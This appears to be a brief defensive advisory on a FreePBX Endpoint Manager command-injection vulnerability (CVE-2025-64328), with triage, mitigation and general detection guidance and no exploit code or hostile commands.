Skip to content

2026-02-03 — Sangoma FreePBX Endpoint Manager OS command injection (CVE-2025-64328)

Signal: Added to CISA KEV on 2026-02-03.

Impact (per CISA): Post-authentication OS command injection in FreePBX Endpoint Manager (testconnectioncheck_ssh_connect()), potentially enabling remote access as the asterisk user.

Vendor/Product: Sangoma FreePBX (Endpoint Manager)

Why this matters

FreePBX is commonly deployed in sensitive environments (telephony/VoIP) and often ends up: - reachable from broad networks - integrated with other business systems

KEV status means exploitation is active; treat exposed/admin-accessible deployments as urgent.

Triage (15–30 minutes)

  1. Find instances

  2. Inventory FreePBX systems and identify whether Endpoint Manager is installed/enabled.

  3. Confirm exposure / access paths

  4. Is the admin interface reachable from the internet or untrusted networks?

  5. Identify who has credentials / access to the affected functionality.

  6. Preserve evidence (if you can do it without delaying patching)

  7. Capture web server logs, FreePBX logs, auth logs, and process history.

Mitigation (do now)

  1. Apply vendor mitigations/patches

  2. Follow Sangoma/FreePBX guidance associated with CVE-2025-64328.

  3. Restrict admin access

  4. Lock down admin UI to VPN/allowlists.

  5. Enforce MFA where available.

  6. Reduce blast radius

  7. Ensure services run with least privilege.

  8. Limit outbound network access from the FreePBX host.

  9. Credential hygiene

  10. Rotate admin passwords and any SIP/provider/API credentials stored on the system.

Hunt / detection ideas

Look for indicators consistent with command injection: - Unusual parameters hitting Endpoint Manager testconnection routes - Unexpected child processes spawned by the web/PHP context - Outbound connections from the FreePBX host to unfamiliar IPs - New files dropped in writable web directories, cron jobs, or startup scripts

References